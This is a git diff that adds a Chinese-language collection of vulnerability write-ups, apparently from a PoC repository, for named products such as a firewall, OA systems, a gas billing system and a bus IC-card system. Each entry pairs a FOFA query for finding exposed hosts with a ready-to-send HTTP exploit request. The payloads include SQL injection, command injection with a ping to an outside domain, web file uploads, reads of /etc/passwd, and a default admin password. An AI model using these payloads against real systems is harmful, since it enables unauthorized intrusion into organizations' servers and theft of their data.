+佑友防火墙+路由，保障您的网络更安全更稳定。弥补传统路由器因内外人数增加带来的网络延迟和不稳定问题；防火墙模块具备了防黑功能，防止ARP等病毒骚扰；佑友防火墙网关同时还配备了上网行为管理模块，可以合理有效控制员工上网行为，大大降低了员工上网中病毒的概率，同时高效使用公司带宽，不会造成网络阻塞等状况。佑友防火墙系统存在远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限，导致服务器失陷。
+
+# 二、影响版本
++ 佑友防火墙
+
+# 三、资产测绘
+```plain
+fofa：title="佑友防火墙"
+```
+
+![1716105993266-59e9b128-8a93-41a8-b677-00d8945bcb20.png](./img/dTTMnaA5q2lFgY7w/1716105993266-59e9b128-8a93-41a8-b677-00d8945bcb20-186037.png)
+
+# 四、漏洞复现
+```plain
+找到系统管理→维护工具→ping→执行whoami命令得到回显
+```
+
+![1716106161838-dda3beeb-dccc-4f50-a473-b4c6a093791e.png](./img/dTTMnaA5q2lFgY7w/1716106161838-dda3beeb-dccc-4f50-a473-b4c6a093791e-945765.png)
+
+
+
+> 更新: 2024-05-23 12:38:07  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dnch59c7m2isqzw2>
\ No newline at end of file
diff --git a/佑友防火墙存在默认口令漏洞.md b/佑友防火墙存在默认口令漏洞.md
new file mode 100644
index 0000000..13a5e35
--- /dev/null
+++ b/佑友防火墙存在默认口令漏洞.md
@@ -0,0 +1,26 @@
+# 佑友防火墙存在默认口令漏洞
+
+# 一、漏洞简介
+佑友防火墙+路由，保障您的网络更安全更稳定。弥补传统路由器因内外人数增加带来的网络延迟和不稳定问题；防火墙模块具备了防黑功能，防止ARP等病毒骚扰；佑友防火墙网关同时还配备了上网行为管理模块，可以合理有效控制员工上网行为，大大降低了员工上网中病毒的概率，同时高效使用公司带宽，不会造成网络阻塞等状况。佑友防火墙存在默认口令漏洞
+
+# 二、影响版本
++ 佑友防火墙
+
+# 三、资产测绘
+```plain
+fofa：title="佑友防火墙"
+```
+
+![1716105993266-59e9b128-8a93-41a8-b677-00d8945bcb20.png](./img/sg2br7PaX_gQpP-2/1716105993266-59e9b128-8a93-41a8-b677-00d8945bcb20-017336.png)
+
+# 四、漏洞复现
+```plain
+admin/hicomadmin
+```
+
+![1716106018479-cb20cbb5-da13-4acb-aba6-eba716b39807.png](./img/sg2br7PaX_gQpP-2/1716106018479-cb20cbb5-da13-4acb-aba6-eba716b39807-983609.png)
+
+
+
+> 更新: 2024-05-23 12:38:07  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uic5wcwdni05byd6>
\ No newline at end of file
diff --git a/信呼OA办公系统后台uploadAction存在SQL注入.md b/信呼OA办公系统后台uploadAction存在SQL注入.md
new file mode 100644
index 0000000..7439c7f
--- /dev/null
+++ b/信呼OA办公系统后台uploadAction存在SQL注入.md
@@ -0,0 +1,37 @@
+# 信呼OA办公系统后台uploadAction存在SQL注入
+
+信呼OA办公系统是一个开源的在线办公系统。 信呼OA办公系统uploadAction存在SQL注入漏洞，攻击者可利用该漏洞获取数据库敏感信息。
+
+## fofa
+
+```java
+icon_hash="1652488516"
+```
+
+## poc
+
+```javascript
+GET /xhoa/api.php?a=getmfilv&m=upload|api&d=task&fileid=1&fname=MScgYW5kIHNsZWVwKDYpIw== HTTP/1.1  
+Host:  
+sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"  
+Sec-Fetch-Dest: empty  
+Accept: application/json, text/javascript, */*; q=0.01  
+Referer: http://127.0.0.1:81/xhoa/  
+Cookie:   
+Sec-Fetch-Mode: cors  
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36  
+Accept-Encoding: gzip, deflate, br, zstd  
+Sec-Fetch-Site: same-origin  
+Accept-Language: zh-CN,zh;q=0.9  
+X-Requested-With: XMLHttpRequest  
+sec-ch-ua-mobile: ?0  
+sec-ch-ua-platform: "Windows"  
+```
+
+![image-20241128092859877](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280928931.png)
+
+
+
+## 漏洞来源
+
+- https://forum.butian.net/article/613
\ No newline at end of file
diff --git a/停车场后台管理系统GetVideo存在SQL注入漏洞.md b/停车场后台管理系统GetVideo存在SQL注入漏洞.md
new file mode 100644
index 0000000..71c5d0d
--- /dev/null
+++ b/停车场后台管理系统GetVideo存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 停车场后台管理系统GetVideo存在SQL注入漏洞
+
+停车场后台管理系统 LaneMonitor/GetVideo 存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+
+```java
+icon_hash="938984120"
+```
+
+## poc
+
+```javascript
+GET /LaneMonitor/GetVideo?passwayno=1%27+AND+GTID_SUBSET%28CONCAT%280x71627a7871%2C%28SELECT+%28ELT%283079%3D3079%2C1%29%29%29%2C0x7176786b71%29%2C3079%29+AND+%27OVwj%27%3D%27OVwj HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+```
+
+![image-20250217095300994](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502170953065.png)
\ No newline at end of file
diff --git a/傲盾信息安全管理系统前台远程命令执行漏洞.md b/傲盾信息安全管理系统前台远程命令执行漏洞.md
new file mode 100644
index 0000000..725d680
--- /dev/null
+++ b/傲盾信息安全管理系统前台远程命令执行漏洞.md
@@ -0,0 +1,57 @@
+# 傲盾信息安全管理系统前台远程命令执行漏洞
+
+# 一、漏洞简介
+傲盾信息安全管理系统是傲盾网络科技股份有限公司的一个信息安全管理产品。该系统的前台存在远程命令执行漏洞,远程攻击者可以构造特殊的请求,注入系统命令,由于过滤不足,导致成功在目标服务器执行任意系统命令。 ,该远程命令执行漏洞的利用难度低，可导致远程命令执行。
+
+# 二、影响版本
++ 傲盾信息安全管理系统
+
+# 三、资产测绘
++ fofa`body="傲盾软件" && body="aodun/aodun.js"`
++ 特征
+
+![1734507351814-666bd451-fc4e-49e9-884e-46941e2d1842.png](./img/iKy_I61sKHi42MYu/1734507351814-666bd451-fc4e-49e9-884e-46941e2d1842-462573.png)
+
+# 四、漏洞复现
+```java
+POST /user_management/sichuan_login HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
+Connection: close
+Content-Length: 97
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded
+
+loginname=sysadmin&ticket=|ping tiqqklzooy.iyhc.eu.org
+```
+
+![1734507422139-2ded6327-4556-4eb0-82c8-9ed2e089e3a9.png](./img/iKy_I61sKHi42MYu/1734507422139-2ded6327-4556-4eb0-82c8-9ed2e089e3a9-169168.png)
+
+```java
+POST /user_management/sichuan_login HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
+Connection: close
+Content-Length: 97
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Content-Type: application/x-www-form-urlencoded
+
+loginname=sysadmin&ticket=|echo `id` > /adm/isms_web/static/base_static/js/aodun/1.txt
+```
+
+![1734525651756-bcce7769-4b89-414e-a37c-8129d0e6e578.png](./img/iKy_I61sKHi42MYu/1734525651756-bcce7769-4b89-414e-a37c-8129d0e6e578-034254.png)
+
+```java
+/static/base_static/js/aodun/1.txt
+```
+
+![1734525670803-4f2787df-a54e-4cc5-8e94-9858b4aacbb4.png](./img/iKy_I61sKHi42MYu/1734525670803-4f2787df-a54e-4cc5-8e94-9858b4aacbb4-639030.png)
+
+
+
+> 更新: 2024-12-20 14:54:44  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sdu622si610nmpvy>
\ No newline at end of file
diff --git a/先锋WEB燃气收费系统AjaxService存在任意文件上传漏洞.md b/先锋WEB燃气收费系统AjaxService存在任意文件上传漏洞.md
new file mode 100644
index 0000000..880f265
--- /dev/null
+++ b/先锋WEB燃气收费系统AjaxService存在任意文件上传漏洞.md
@@ -0,0 +1,55 @@
+# 先锋WEB燃气收费系统AjaxService存在任意文件上传漏洞
+
+# 一、漏洞简介
+先锋WEB燃气收费系统是由杭州先锋电子技术股份有限公司开发的一款服务于能源行业的系统，先锋WEB燃气收费系统存在文件上传漏洞，可导致攻击者获取服务器权限。
+
+# 二、影响版本
++ 先锋WEB燃气收费系统
+
+# 三、资产测绘
++ fofa`app="先锋WEB燃气收费系统"`
++ 特征
+
+![1704874235704-3e56b6a3-908c-40ed-b95e-56d707535373.png](./img/HdzFuW3QJddJoKxY/1704874235704-3e56b6a3-908c-40ed-b95e-56d707535373-574124.png)
+
+# 四、漏洞复现
+```java
+POST /AjaxService/Upload.aspx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------38002115147665341923847377752
+Content-Length: 710
+Origin: null
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+-----------------------------38002115147665341923847377752
+Content-Disposition: form-data; name="Fdata"; filename="1ndex.aspx"
+Content-Type: text/html
+
+
+123
+-----------------------------38002115147665341923847377752
+Content-Disposition: form-data; name="submit"
+
+Submin
+-----------------------------38002115147665341923847377752--
+```
+
+![1704874299499-1f95c955-e080-4a8a-b9ae-cc15ac11c5e2.png](./img/HdzFuW3QJddJoKxY/1704874299499-1f95c955-e080-4a8a-b9ae-cc15ac11c5e2-839949.png)
+
+上传文件位置
+
+```java
+/UploadFile/202401/2024011004110066.aspx
+```
+
+![1704874346773-47fd980d-4198-4d87-b60b-20d20660ccd4.png](./img/HdzFuW3QJddJoKxY/1704874346773-47fd980d-4198-4d87-b60b-20d20660ccd4-793587.png)
+
+
+
+> 更新: 2024-02-29 23:55:42  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sra2po2of1g77mo7>
\ No newline at end of file
diff --git a/全新优客API接口管理系统doc存在SQL注入漏洞.md b/全新优客API接口管理系统doc存在SQL注入漏洞.md
new file mode 100644
index 0000000..92155fb
--- /dev/null
+++ b/全新优客API接口管理系统doc存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+# 全新优客API接口管理系统doc存在SQL注入漏洞
+
+全新优客API接口管理系统 index/doc 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+body="public/static/index/css/flaghome.css"
+```
+
+## poc
+
+```javascript
+POST /index/index/doc HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+id=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@VERSION,NULL-- -
+```
+
+![image-20241114142149139](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411141421210.png)
\ No newline at end of file
diff --git a/全程云OA接口UploadFile存在任意文件上传漏洞.md b/全程云OA接口UploadFile存在任意文件上传漏洞.md
new file mode 100644
index 0000000..3ed3a19
--- /dev/null
+++ b/全程云OA接口UploadFile存在任意文件上传漏洞.md
@@ -0,0 +1,37 @@
+# 全程云OA接口UploadFile存在任意文件上传漏洞
+
+全程云OA接口UploadFile存在任意文件上传漏洞。该漏洞允许攻击者上传webshell木马获取服务器权限。
+
+## fofa
+
+```java
+body="images/yipeoplehover.png"
+```
+
+## poc
+
+```java
+POST /OA/api/2.0/Common/AttachFile/UploadFile HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Ldwk: bG91ZG9uZ3dlbmt1
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNe8DcVuv1vEUWDaR
+Content-Length: 191
+
+------WebKitFormBoundaryNe8DcVuv1vEUWDaR
+Content-Disposition: form-data; name="upload";filename="123.Asp"
+
+<% response.write("hello,world") %>
+------WebKitFormBoundaryNe8DcVuv1vEUWDaR--
+```
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/T4kFVsKphUd6OYRYMyMUtg
\ No newline at end of file
diff --git a/全程云OA系统QCPES.asmx存在SQL注入漏洞.md b/全程云OA系统QCPES.asmx存在SQL注入漏洞.md
new file mode 100644
index 0000000..9c19b5d
--- /dev/null
+++ b/全程云OA系统QCPES.asmx存在SQL注入漏洞.md
@@ -0,0 +1,49 @@
+# 全程云OA系统QCPES.asmx存在SQL注入漏洞
+
+全程云OA QCPES.asmx 接口多个实例处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+body="images/yipeoplehover.png"
+```
+
+## poc
+
+```javascript
+POST /OA/PES/QCPES.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetCode"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetCode xmlns="http://tempuri.org/">
+      <fk_parid>1' UNION ALL SELECT @@VERSION-- oCWH</fk_parid>
+      <value>1</value>
+    </GetCode>
+  </soap:Body>
+</soap:Envelope>
+```
+
+```javascript
+POST /OA/PES/QCPES.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetValue"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetValue xmlns="http://tempuri.org/">
+      <fk_parid>1</fk_parid>
+      <code>1' UNION ALL SELECT @@VERSION-- oCWH</code>
+    </GetValue>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![image-20241106224830320](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411062248382.png)
\ No newline at end of file
diff --git a/全行业小程序运营系统接口_requestPost存在任意文件读取漏洞.md b/全行业小程序运营系统接口_requestPost存在任意文件读取漏洞.md
new file mode 100644
index 0000000..626f2f3
--- /dev/null
+++ b/全行业小程序运营系统接口_requestPost存在任意文件读取漏洞.md
@@ -0,0 +1,34 @@
+# 全行业小程序运营系统接口_requestPost存在任意文件读取漏洞
+
+# 一、漏洞简介
+全行业小程序运营系统是一个无需编程，各行业模版直接套用，一键生成，轻松搭建小程序，界面自由DIY，同步实时预览，可视化操作让您所见即所得，随心打造个性小程序。全行业小程序运营系统接口_requestPost存在任意文件读取漏洞
+
+# 二、影响版本
+全行业小程序运营系统
+
+# 三、资产测绘
+```plain
+"/com/css/head_foot.css"
+```
+
+![1721066404678-898e96b4-2cea-4e70-9dac-653d60e96720.png](./img/bH9l78edGUcZCbQD/1721066404678-898e96b4-2cea-4e70-9dac-653d60e96720-692946.png)
+
+# 四、漏洞复现
+```plain
+GET /api/wxapps/_requestPost?url=file:///etc/passwd&data=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+```
+
+![1721067419506-8c5e67ed-72de-4ba9-86f6-3fd3fd3f9a0d.png](./img/bH9l78edGUcZCbQD/1721067419506-8c5e67ed-72de-4ba9-86f6-3fd3fd3f9a0d-553972.png)
+
+```plain
+/api/wxapps/_requestPost?url=file:///C:/windows/win.ini&data=1
+```
+
+![1721067536077-3ea5d227-9a72-4564-b33c-443cef0742f5.png](./img/bH9l78edGUcZCbQD/1721067536077-3ea5d227-9a72-4564-b33c-443cef0742f5-856042.png)
+
+
+
+> 更新: 2024-08-12 17:16:00  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xhsw1s8g1fmxb8nf>
\ No newline at end of file
diff --git a/公交IC卡收单管理系统bus存在SQL注入漏洞 2.md b/公交IC卡收单管理系统bus存在SQL注入漏洞 2.md
new file mode 100644
index 0000000..1bbe113
--- /dev/null
+++ b/公交IC卡收单管理系统bus存在SQL注入漏洞 2.md	
@@ -0,0 +1,42 @@
+# 公交IC卡收单管理系统bus存在SQL注入漏洞
+
+公交IC卡收单管理系统bus存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+app="公交IC卡收单管理系统"
+```
+
+## poc
+
+获取cookie
+
+```javascript
+POST /login HTTP/1.1
+Host: 
+Accept: */*
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Priority: u=0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+X-Requested-With: XMLHttpRequest
+
+username=admin&password=e10adc3949ba59abbe56e057f20f883e
+```
+
+```jade
+POST /bus HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+
+_search=false&nd=1727248354972&rowCountPerPage=10&pageNo=1&sidx=BUS_CODE&sord=asc&method=select&BUS_CODE=1');WAITFOR DELAY '0:0:5'--
+```
+
diff --git a/公交IC卡收单管理系统bus存在SQL注入漏洞.md b/公交IC卡收单管理系统bus存在SQL注入漏洞.md
new file mode 100644
index 0000000..5f2e63f
--- /dev/null
+++ b/公交IC卡收单管理系统bus存在SQL注入漏洞.md
@@ -0,0 +1,35 @@
+# 公交IC卡收单管理系统bus存在SQL注入漏洞
+
+# 一、漏洞简介
+公交IC卡收单管理系统是城市公共交通领域中不可或缺的一部分，它通过集成先进的集成电路技术（IC卡）实现了乘客便捷的支付方式，并有效提高了公共交通运营效率。系统集成了发卡、充值、消费、数据采集、查询和注销等多个功能模块，为公交公司和乘客提供了全面、高效、便捷的公共交通支付解决方案。该系统不仅提升了乘客的出行体验，还降低了公交公司的运营成本，提高了管理效率。公交IC卡收单管理系统bus存在SQL注入漏洞。经过身份验证的攻击者通过漏洞执行任意SQL语句，调用xp_cmdshell写入后门文件，执行任意代码，从而获取到服务器权限。
+
+# 二、影响版本
++ 公交IC卡收单管理系统
+
+# 三、资产测绘
++ fofa`app="公交IC卡收单管理系统"`
++ 特征
+
+![1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5.png](./img/giAq65h_S8s7uRND/1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5-534614.png)
+
+# 四、漏洞复现
+```java
+POST /assets/..;/bus HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ 
+_search=false&nd=1727248354972&rowCountPerPage=10&pageNo=1&sidx=BUS_CODE&sord=asc&method=select&BUS_CODE=1');WAITFOR DELAY '0:0:5'--
+```
+
+![1727274271656-6a16a890-34ae-4997-bf7e-9dca4dfa13fe.png](./img/giAq65h_S8s7uRND/1727274271656-6a16a890-34ae-4997-bf7e-9dca4dfa13fe-448402.png)
+
+
+
+> 更新: 2024-10-22 09:36:09  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rs9z40892wvgac14>
\ No newline at end of file
diff --git a/公交IC卡收单管理系统line存在SQL注入漏洞 2.md b/公交IC卡收单管理系统line存在SQL注入漏洞 2.md
new file mode 100644
index 0000000..991452e
--- /dev/null
+++ b/公交IC卡收单管理系统line存在SQL注入漏洞 2.md	
@@ -0,0 +1,43 @@
+# 公交IC卡收单管理系统line存在SQL注入漏洞
+
+公交IC卡收单管理系统line存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+app="公交IC卡收单管理系统"
+```
+
+## poc
+
+获取cookie
+
+```javascript
+POST /login HTTP/1.1
+Host: 
+Accept: */*
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Priority: u=0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+X-Requested-With: XMLHttpRequest
+
+username=admin&password=e10adc3949ba59abbe56e057f20f883e
+```
+
+```javascript
+POST /line HTTP/1.1
+Host: 
+Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C
+X-Requested-With: XMLHttpRequest
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Priority: u=0
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+_search=false&nd=1727248712232&rowCountPerPage=10&pageNo=1&sidx=LINE_CODE&sord=asc&method=select&ORGANIZATION_CODE=&LINE_CODE=1');WAITFOR DELAY '0:0:5'--
+```
+
diff --git a/公交IC卡收单管理系统line存在SQL注入漏洞.md b/公交IC卡收单管理系统line存在SQL注入漏洞.md
new file mode 100644
index 0000000..c75e6f5
--- /dev/null
+++ b/公交IC卡收单管理系统line存在SQL注入漏洞.md
@@ -0,0 +1,36 @@
+# 公交IC卡收单管理系统line存在SQL注入漏洞
+
+# 一、漏洞简介
+公交IC卡收单管理系统是城市公共交通领域中不可或缺的一部分，它通过集成先进的集成电路技术（IC卡）实现了乘客便捷的支付方式，并有效提高了公共交通运营效率。系统集成了发卡、充值、消费、数据采集、查询和注销等多个功能模块，为公交公司和乘客提供了全面、高效、便捷的公共交通支付解决方案。该系统不仅提升了乘客的出行体验，还降低了公交公司的运营成本，提高了管理效率。公交IC卡收单管理系统line存在SQL注入漏洞。经过身份验证的攻击者通过漏洞执行任意SQL语句，调用xp_cmdshell写入后门文件，执行任意代码，从而获取到服务器权限。
+
+# 二、影响版本
++ 公交IC卡收单管理系统
+
+# 三、资产测绘
++ fofa`app="公交IC卡收单管理系统"`
++ 特征
+
+![1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5.png](./img/27itoy_d4ROVZs5J/1727274040056-105b772f-bf3b-4e57-bb11-3f4c308b04c5-833989.png)
+
+# 四、漏洞复现
+```java
+POST /assets/..;/line HTTP/1.1
+Host: 
+Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C
+X-Requested-With: XMLHttpRequest
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Priority: u=0
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ 
+_search=false&nd=1727248712232&rowCountPerPage=10&pageNo=1&sidx=LINE_CODE&sord=asc&method=select&ORGANIZATION_CODE=&LINE_CODE=1');WAITFOR DELAY '0:0:5'--
+```
+
+![1727274356642-8fe0f2b0-4e2e-4779-b3c6-a2f3949306fe.png](./img/27itoy_d4ROVZs5J/1727274356642-8fe0f2b0-4e2e-4779-b3c6-a2f3949306fe-268894.png)
+
+
+
+> 更新: 2024-10-22 09:36:09  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gg6lz5os1welciza>
\ No newline at end of file
diff --git a/公交IC卡收单管理系统parametercard存在SQL注入漏洞 2.md b/公交IC卡收单管理系统parametercard存在SQL注入漏洞 2.md
new file mode 100644
index 0000000..8ac4bb9
--- /dev/null
+++ b/公交IC卡收单管理系统parametercard存在SQL注入漏洞 2.md	
@@ -0,0 +1,43 @@
+# 公交IC卡收单管理系统parametercard存在SQL注入漏洞
+
+公交IC卡收单管理系统parametercard存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+app="公交IC卡收单管理系统"
+```
+
+## poc
+
+获取cookie
+
+```javascript
+POST /login HTTP/1.1
+Host: 
+Accept: */*
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate
+Priority: u=0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+X-Requested-With: XMLHttpRequest
+
+username=admin&password=e10adc3949ba59abbe56e057f20f883e
+```
+
+```javascript
+POST /parametercard HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Priority: u=0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Cookie: JSESSIONID=BE20D06711487C9D6D5325C1129F244C
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+
+method=select&organization=&lineCode=&_search=false&nd=1727249021156&rowCountPerPage=10&pageNo=1&sidx=LINE_CODE&sord=asc&ORGANIZATION_CODE=&LINE_CODE=1');WAITFOR DELAY '0:0:5'--
+```
+
diff --git a/公交IC卡收单管理系统parametercard存在SQL注入漏洞.md b/公交IC卡收单管理系统parametercard存在SQL注入漏洞.md
new file mode 100644
index 0000000..1a296db
--- /dev/null
+++ b/公交IC卡收单管理系统parametercard存在SQL注入漏洞.md
@@ -0,0 +1,36 @@
+# 公交IC卡收单管理系统parametercard存在SQL注入漏洞
+
+# 一、漏洞简介
+公交IC卡收单管理系统是城市公共交通领域中不可或缺的一部分，它通过集成先进的集成电路技术（IC卡）实现了乘客便捷的支付方式，并有效提高了公共交通运营效率。系统集成了发卡、充值、消费、数据采集、查询和注销等多个功能模块，为公交公司和乘客提供了全面、高效、便捷的公共交通支付解决方案。该系统不仅提升了乘客的出行体验，还降低了公交公司的运营成本，提高了管理效率。公交IC卡收单管理系统parametercard存在SQL注入漏洞。经过身份验证的攻击者通过漏洞执行任意SQL语句，调用xp_cmdshell写入后门文件，执行任意代码，从而获取到服务器权限。
+
+# 二、影响版本
++ 公交IC卡收单管理系统
+
